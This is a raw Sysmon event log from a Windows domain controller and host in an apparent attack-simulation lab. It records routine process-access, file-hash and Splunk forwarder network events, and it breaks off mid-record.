11:28:32.756{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299561Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:32.756{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299560Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:32.756{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299559Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:32.756{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299558Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:32.756{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299557Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:32.755{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299556Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:32.755{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000223396Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:33.974{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCAD5B31D21A088A86F202B114890A1A,SHA256=5075C0A0DD8D7AE14A63B434587802423CAE592924CCB59832A5A0FA22637022,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000299596Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:33.808{C8EA50B7-F11F-6215-0D00-000000003802}8883340C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000299595Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:33.693{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=2C172263FA8EEF1711C95B3675DB1497,SHA256=17490A93673B0FAE736468335A08EFBDA72E384E966AB61782503A3D41F245B7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299594Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:30.670{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49626-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000299593Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:33.058{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28265DDD3AEA24A3F3B0DE3EA63659F7,SHA256=D304DAD6D0C6F8840E22F82C56245812E337B3FC73F1085937D03E5DE49ECDE5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223397Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:34.975{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F41261331B1725F2572A23081DC435C0,SHA256=A7734EEE264A932E8C39082772ECA31723C35ACBB3BD6499B29C84D629467D96,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299597Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:34.092{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80AD3DD5E8A22216D62ADE69DBC8DF00,SHA256=C7039ECBD9AFBB3C7539227FC0AF57233EEDC8BA99A1483398192DDAA3F78E56,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223398Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:35.975{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4A615CB052F90DB8DD050D29B077525,SHA256=6C34908C8DF90118DFFA0B20978EFFE81B86E58A89C48A88E668918EDAE4682F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299598Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:35.138{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B0FFAE762DC3757571AEB4A7AFE9EDF,SHA256=7CB4C4C6984D8A1101A14DE8CB81EB9813FC427D60EE0C4936BD86263B59186A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299599Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:36.157{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC205A0D8AAA720D5E41F78DEDADAD8C,SHA256=5D18D7D7F404334F440E7284F76B2F681D333A601534FA0EB9D2CA314036BC30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299600Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:37.206{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4C78FD7DC80F55C4B8BABE6F7A489FE,SHA256=3E32B8E438C19938AECAC1F03E0AFFE725953FF482ECCD5CCEFD8CE541A04420,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223400Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:34.619{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51786-false10.0.1.12-8000- 23542300x8000000000000000223399Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:37.054{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2D93C53C8D49F81EAF38E8BC4D5855B,SHA256=808BC443A54D6D363477484E224632CF515ACFD0BBE31669CB4272DF6BEB9641,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223401Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:38.058{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEF1EDFDAA746D683895548DE8E59067,SHA256=EB1BC8D0D1A0B193A763113A6592B0D1C3680EA8C9460C599DD44C99D2ADDA74,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299602Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:38.221{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B38283079A556B1B1C5779596CCF6EFE,SHA256=0E008D4281496E8BDA7150B6926CD84E2A04409A26D231F6E568D4B702BD796D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299601Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:35.698{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49627-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000223402Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:39.070{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6583BC01BA12F1A196C2FFEC6BB09547,SHA256=20B5F2F51023C33818320CFFAE43A0D403FD665E774511E29DE17E90F04311ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299603Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:39.256{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9DDD0472D0140CF806729A36C652721,SHA256=00B8051541FBAE851A9B9193C30758C4F1C55A33BCCD4BABA5EAF57DFD78B873,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299605Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:40.788{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299604Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:40.273{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09455C050652BDDA5891D6362548CFBD,SHA256=4EEC2E2A8993ECEA5C98007CCBDA06CC438D5A6A9ECB78ACC8ECCC321280085A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223403Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:40.227{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EAA4E3DABCF2257B3C754153441E20E1,SHA256=9D23A39015BC2E3D6EDFCA738432C21F557329F459899407CE69CBA2896ADDB5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299607Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:41.553{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=2C93468CD4A2586B4E58AC4F02938197,SHA256=D83A1C681AEBA9DA3100AC88D31A81407B26AF356B276E2C420EB17D19DE561C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299606Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:41.288{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=353E6F7EB4A01C556246B80D94BA6C9A,SHA256=AA97B6923C001F5F18EE3439342AEC011197422AB83F67A55763E763F3B8C438,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223404Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:41.228{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=911C8A456BC1F100BD7E00B878234B21,SHA256=64F0C17FA8B1C49926484465290E6B7346A81ECE1A7C43562696EFA68091D270,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299609Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:42.288{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CF14B35D0EB678E7567D8F81AE4162C,SHA256=81FB192A2A858C8DAC97BABCFF7BFA62E9BF08B9BC2F59E55C616497703E0181,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223406Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:40.466{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51787-false10.0.1.12-8000- 23542300x8000000000000000223405Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:42.244{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96B7BEA5E194DE865A6069D5B3F42019,SHA256=D11F7C1392075A2E6B3E0CBDAB8E4F6AACB7C9BAA9514361C369A85FAF74EB57,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299608Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:40.233{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49628-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000223407Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:43.463{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F174E088455471977638EF0BB2928C1,SHA256=43994A7E1923154AB5FE0FC93A5484D02F467BEC25B55DD32479EEA50BDD7B64,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299610Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:43.306{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C71A7919554E924FBAD042DD7405AEE9,SHA256=5E37124F76FC5F23464BF697AF8BBC6A492F12CE9B54146FDFC8478FC9159184,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000223435Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:44.901{4F8D34B0-1A6C-6216-6405-000000003902}2528608C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223434Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:44.714{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1A6C-6216-6405-000000003902}2528C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223433Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:44.714{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223432Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:44.714{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223431Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:44.714{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223430Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 